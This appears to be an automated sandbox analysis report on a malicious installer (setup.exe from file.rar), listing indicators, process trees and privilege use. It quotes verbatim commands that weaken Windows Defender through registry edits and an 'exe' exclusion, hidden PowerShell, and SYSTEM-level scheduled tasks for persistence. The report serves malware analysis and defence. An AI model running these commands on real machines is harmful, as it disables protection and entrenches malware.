19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 setup.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
vlc.exepid process 3020 vlc.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
taskmgr.exepid process 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
vlc.exetaskmgr.exepid process 3020 vlc.exe 1736 taskmgr.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 460 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskmgr.exe7zG.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exesvchost.exeQsEZf7p3mqmJQ7IoFER23P5U.exepowershell.exepowershell.exeWMIC.exepowershell.exepowershell.exeWMIC.exepowershell.EXEpowershell.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 1736 taskmgr.exe Token: SeRestorePrivilege 1624 7zG.exe Token: 35 1624 7zG.exe Token: SeSecurityPrivilege 1624 7zG.exe Token: SeSecurityPrivilege 1624 7zG.exe Token: SeShutdownPrivilege 1616 powercfg.exe Token: SeShutdownPrivilege 2936 powercfg.exe Token: SeShutdownPrivilege 924 powercfg.exe Token: SeShutdownPrivilege 1124 powercfg.exe Token: SeShutdownPrivilege 2356 powercfg.exe Token: SeShutdownPrivilege 668 powercfg.exe Token: SeShutdownPrivilege 2444 powercfg.exe Token: SeShutdownPrivilege 432 powercfg.exe Token: SeLockMemoryPrivilege 3020 svchost.exe Token: SeDebugPrivilege 2976 QsEZf7p3mqmJQ7IoFER23P5U.exe Token: SeDebugPrivilege 1564 powershell.exe Token: SeDebugPrivilege 2616 powershell.exe Token: SeIncreaseQuotaPrivilege 2628 WMIC.exe Token: SeSecurityPrivilege 2628 WMIC.exe Token: SeTakeOwnershipPrivilege 2628 WMIC.exe Token: SeLoadDriverPrivilege 2628 WMIC.exe Token: SeSystemProfilePrivilege 2628 WMIC.exe Token: SeSystemtimePrivilege 2628 WMIC.exe Token: SeProfSingleProcessPrivilege 2628 WMIC.exe Token: SeIncBasePriorityPrivilege 2628 WMIC.exe Token: SeCreatePagefilePrivilege 2628 WMIC.exe Token: SeBackupPrivilege 2628 WMIC.exe Token: SeRestorePrivilege 2628 WMIC.exe Token: SeShutdownPrivilege 2628 WMIC.exe Token: SeDebugPrivilege 2628 WMIC.exe Token: SeSystemEnvironmentPrivilege 2628 WMIC.exe Token: SeRemoteShutdownPrivilege 2628 WMIC.exe Token: SeUndockPrivilege 2628 WMIC.exe Token: SeManageVolumePrivilege 2628 WMIC.exe Token: 33 2628 WMIC.exe Token: 34 2628 WMIC.exe Token: 35 2628 WMIC.exe Token: SeDebugPrivilege 3032 powershell.exe Token: SeDebugPrivilege 2964 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1944 WMIC.exe Token: SeIncreaseQuotaPrivilege 1944 WMIC.exe Token: SeSecurityPrivilege 1944 WMIC.exe Token: SeTakeOwnershipPrivilege 1944 WMIC.exe Token: SeLoadDriverPrivilege 1944 WMIC.exe Token: SeSystemtimePrivilege 1944 WMIC.exe Token: SeBackupPrivilege 1944 WMIC.exe Token: SeRestorePrivilege 1944 WMIC.exe Token: SeShutdownPrivilege 1944 WMIC.exe Token: SeSystemEnvironmentPrivilege 1944 WMIC.exe Token: SeUndockPrivilege 1944 WMIC.exe Token: SeManageVolumePrivilege 1944 WMIC.exe Token: SeDebugPrivilege 2548 powershell.EXE Token: SeDebugPrivilege 2712 powershell.exe Token: SeDebugPrivilege 2112 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2456 WMIC.exe Token: SeIncreaseQuotaPrivilege 2456 WMIC.exe Token: SeSecurityPrivilege 2456 WMIC.exe Token: SeTakeOwnershipPrivilege 2456 WMIC.exe Token: SeLoadDriverPrivilege 2456 WMIC.exe Token: SeSystemtimePrivilege 2456 WMIC.exe Token: SeBackupPrivilege 2456 WMIC.exe Token: SeRestorePrivilege 2456 WMIC.exe Token: SeShutdownPrivilege 2456 WMIC.exe Token: SeSystemEnvironmentPrivilege 2456 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
vlc.exetaskmgr.exe7zG.exepid process 3020 vlc.exe 3020 vlc.exe 3020 vlc.exe 3020 vlc.exe 3020 vlc.exe 3020 vlc.exe 3020 vlc.exe 3020 vlc.exe 3020 vlc.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1624 7zG.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
vlc.exetaskmgr.exepid process 3020 vlc.exe 3020 vlc.exe 3020 vlc.exe 3020 vlc.exe 3020 vlc.exe 3020 vlc.exe 3020 vlc.exe 3020 vlc.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe 1736 taskmgr.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
vlc.exejNFCat12JprTAJuHReQN2XR8.exefw6AeST27Bm2vlk0DxSBSQX2.exepid process 3020 vlc.exe 2272 jNFCat12JprTAJuHReQN2XR8.exe 676 fw6AeST27Bm2vlk0DxSBSQX2.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exerundll32.exerundll32.exesetup.exeDH8573Md6ciWRCrzNsLgNn0N.exeHZCRf2RVpwaPOKWoRBM82pMK.exejNFCat12JprTAJuHReQN2XR8.exedescription pid process target process PID 2444 wrote to memory of 2620 2444 cmd.exe rundll32.exe PID 2444 wrote to memory of 2620 2444 cmd.exe rundll32.exe PID 2444 wrote to memory of 2620 2444 cmd.exe rundll32.exe PID 2620 wrote to memory of 2604 2620 rundll32.exe rundll32.exe PID 2620 wrote to memory of 2604 2620 rundll32.exe rundll32.exe PID 2620 wrote to memory of 2604 2620 rundll32.exe rundll32.exe PID 2604 wrote to memory of 3020 2604 rundll32.exe vlc.exe PID 2604 wrote to memory of 3020 2604 rundll32.exe vlc.exe PID 2604 wrote to memory of 3020 2604 rundll32.exe vlc.exe PID 2808 wrote to memory of 3052 2808 setup.exe HZCRf2RVpwaPOKWoRBM82pMK.exe PID 2808 wrote to memory of 3052 2808 setup.exe HZCRf2RVpwaPOKWoRBM82pMK.exe PID 2808 wrote to memory of 3052 2808 setup.exe HZCRf2RVpwaPOKWoRBM82pMK.exe PID 2808 wrote to memory of 3052 2808 setup.exe HZCRf2RVpwaPOKWoRBM82pMK.exe PID 2808 wrote to memory of 3052 2808 setup.exe HZCRf2RVpwaPOKWoRBM82pMK.exe PID 2808 wrote to memory of 3052 2808 setup.exe HZCRf2RVpwaPOKWoRBM82pMK.exe PID 2808 wrote to memory of 3052 2808 setup.exe HZCRf2RVpwaPOKWoRBM82pMK.exe PID 2808 wrote to memory of 2272 2808 setup.exe jNFCat12JprTAJuHReQN2XR8.exe PID 2808 wrote to memory of 2272 2808 setup.exe jNFCat12JprTAJuHReQN2XR8.exe PID 2808 wrote to memory of 2272 2808 setup.exe jNFCat12JprTAJuHReQN2XR8.exe PID 2808 wrote to memory of 2272 2808 setup.exe jNFCat12JprTAJuHReQN2XR8.exe PID 2808 wrote to memory of 2976 2808 setup.exe QsEZf7p3mqmJQ7IoFER23P5U.exe PID 2808 wrote to memory of 2976 2808 setup.exe QsEZf7p3mqmJQ7IoFER23P5U.exe PID 2808 wrote to memory of 2976 2808 setup.exe QsEZf7p3mqmJQ7IoFER23P5U.exe PID 2808 wrote to memory of 2976 2808 setup.exe QsEZf7p3mqmJQ7IoFER23P5U.exe PID 2808 wrote to memory of 2176 2808 setup.exe 2Bieq5wNDNkAsJ0rFBlk_AlN.exe PID 2808 wrote to memory of 2176 2808 setup.exe 2Bieq5wNDNkAsJ0rFBlk_AlN.exe PID 2808 wrote to memory of 2176 2808 setup.exe 2Bieq5wNDNkAsJ0rFBlk_AlN.exe PID 2808 wrote to memory of 2176 2808 setup.exe 2Bieq5wNDNkAsJ0rFBlk_AlN.exe PID 2808 wrote to memory of 2168 2808 setup.exe Pus3tCSrefwVPztCKhp87ihX.exe PID 2808 wrote to memory of 2168 2808 setup.exe Pus3tCSrefwVPztCKhp87ihX.exe PID 2808 wrote to memory of 2168 2808 setup.exe Pus3tCSrefwVPztCKhp87ihX.exe PID 2808 wrote to memory of 676 2808 setup.exe fw6AeST27Bm2vlk0DxSBSQX2.exe PID 2808 wrote to memory of 676 2808 setup.exe fw6AeST27Bm2vlk0DxSBSQX2.exe PID 2808 wrote to memory of 676 2808 setup.exe fw6AeST27Bm2vlk0DxSBSQX2.exe PID 2808 wrote to memory of 676 2808 setup.exe fw6AeST27Bm2vlk0DxSBSQX2.exe PID 2808 wrote to memory of 676 2808 setup.exe fw6AeST27Bm2vlk0DxSBSQX2.exe PID 2808 wrote to memory of 676 2808 setup.exe fw6AeST27Bm2vlk0DxSBSQX2.exe PID 2808 wrote to memory of 676 2808 setup.exe fw6AeST27Bm2vlk0DxSBSQX2.exe PID 2808 wrote to memory of 848 2808 setup.exe DH8573Md6ciWRCrzNsLgNn0N.exe PID 2808 wrote to memory of 848 2808 setup.exe DH8573Md6ciWRCrzNsLgNn0N.exe PID 2808 wrote to memory of 848 2808 setup.exe DH8573Md6ciWRCrzNsLgNn0N.exe PID 2808 wrote to memory of 848 2808 setup.exe DH8573Md6ciWRCrzNsLgNn0N.exe PID 2808 wrote to memory of 848 2808 setup.exe DH8573Md6ciWRCrzNsLgNn0N.exe PID 2808 wrote to memory of 848 2808 setup.exe DH8573Md6ciWRCrzNsLgNn0N.exe PID 2808 wrote to memory of 848 2808 setup.exe DH8573Md6ciWRCrzNsLgNn0N.exe PID 2808 wrote to memory of 1716 2808 setup.exe f2hEJNjebYbdDHdjR8ZZyQ9Q.exe PID 2808 wrote to memory of 1716 2808 setup.exe f2hEJNjebYbdDHdjR8ZZyQ9Q.exe PID 2808 wrote to memory of 1716 2808 setup.exe f2hEJNjebYbdDHdjR8ZZyQ9Q.exe PID 2808 wrote to memory of 1716 2808 setup.exe f2hEJNjebYbdDHdjR8ZZyQ9Q.exe PID 848 wrote to memory of 1036 848 DH8573Md6ciWRCrzNsLgNn0N.exe DH8573Md6ciWRCrzNsLgNn0N.tmp PID 848 wrote to memory of 1036 848 DH8573Md6ciWRCrzNsLgNn0N.exe DH8573Md6ciWRCrzNsLgNn0N.tmp PID 848 wrote to memory of 1036 848 DH8573Md6ciWRCrzNsLgNn0N.exe DH8573Md6ciWRCrzNsLgNn0N.tmp PID 848 wrote to memory of 1036 848 DH8573Md6ciWRCrzNsLgNn0N.exe DH8573Md6ciWRCrzNsLgNn0N.tmp PID 848 wrote to memory of 1036 848 DH8573Md6ciWRCrzNsLgNn0N.exe DH8573Md6ciWRCrzNsLgNn0N.tmp PID 848 wrote to memory of 1036 848 DH8573Md6ciWRCrzNsLgNn0N.exe DH8573Md6ciWRCrzNsLgNn0N.tmp PID 848 wrote to memory of 1036 848 DH8573Md6ciWRCrzNsLgNn0N.exe DH8573Md6ciWRCrzNsLgNn0N.tmp PID 3052 wrote to memory of 2868 3052 HZCRf2RVpwaPOKWoRBM82pMK.exe Install.exe PID 3052 wrote to memory of 2868 3052 HZCRf2RVpwaPOKWoRBM82pMK.exe Install.exe PID 3052 wrote to memory of 2868 3052 HZCRf2RVpwaPOKWoRBM82pMK.exe Install.exe PID 3052 wrote to memory of 2868 3052 HZCRf2RVpwaPOKWoRBM82pMK.exe Install.exe PID 3052 wrote to memory of 2868 3052 HZCRf2RVpwaPOKWoRBM82pMK.exe Install.exe PID 3052 wrote to memory of 2868 3052 HZCRf2RVpwaPOKWoRBM82pMK.exe Install.exe PID 3052 wrote to memory of 2868 3052 HZCRf2RVpwaPOKWoRBM82pMK.exe Install.exe PID 2272 wrote to memory of 2892 2272 jNFCat12JprTAJuHReQN2XR8.exe schtasks.exe -
outlook_office_path 1 IoCs
Processes:
jNFCat12JprTAJuHReQN2XR8.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jNFCat12JprTAJuHReQN2XR8.exe -
outlook_win_path 1 IoCs
Processes:
jNFCat12JprTAJuHReQN2XR8.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jNFCat12JprTAJuHReQN2XR8.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\file.rar1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\file.rar2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\file.rar3⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\file.rar"4⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\verclsid.exe"C:\Windows\system32\verclsid.exe" /S /C {0B2C9183-C9FA-4C53-AE21-C900B0C39965} /I {0C733A8A-2A1C-11CE-ADE5-00AA0044773D} /X 0x4011⤵
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\file\" -spe -an -ai#7zMap23962:88:7zEvent16011⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\file\setup.exe"C:\Users\Admin\AppData\Local\Temp\file\setup.exe"1⤵
- Modifies firewall policy service
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\SimpleAdobe\HZCRf2RVpwaPOKWoRBM82pMK.exeC:\Users\Admin\Documents\SimpleAdobe\HZCRf2RVpwaPOKWoRBM82pMK.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSDBEE.tmp\Install.exe.\Install.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS13CF.tmp\Install.exe.\Install.exe /hsdidPpAQu "385135" /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force9⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bKPbLIPtdWjYWtgKbM" /SC once /ST 20:57:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ\HCRvTsVXhEUoxKl\alRnUJb.exe\" M5 /dNcdidaLlL 385135 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bKPbLIPtdWjYWtgKbM"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bKPbLIPtdWjYWtgKbM6⤵
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bKPbLIPtdWjYWtgKbM7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 592 -s 6045⤵
- Program crash
-
C:\Users\Admin\Documents\SimpleAdobe\jNFCat12JprTAJuHReQN2XR8.exeC:\Users\Admin\Documents\SimpleAdobe\jNFCat12JprTAJuHReQN2XR8.exe2⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\SimpleAdobe\QsEZf7p3mqmJQ7IoFER23P5U.exeC:\Users\Admin\Documents\SimpleAdobe\QsEZf7p3mqmJQ7IoFER23P5U.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- Loads dropped DLL
- Checks processor information in registry
-
C:\ProgramData\DBKKFHIEGD.exe"C:\ProgramData\DBKKFHIEGD.exe"4⤵
- Executes dropped EXE
-
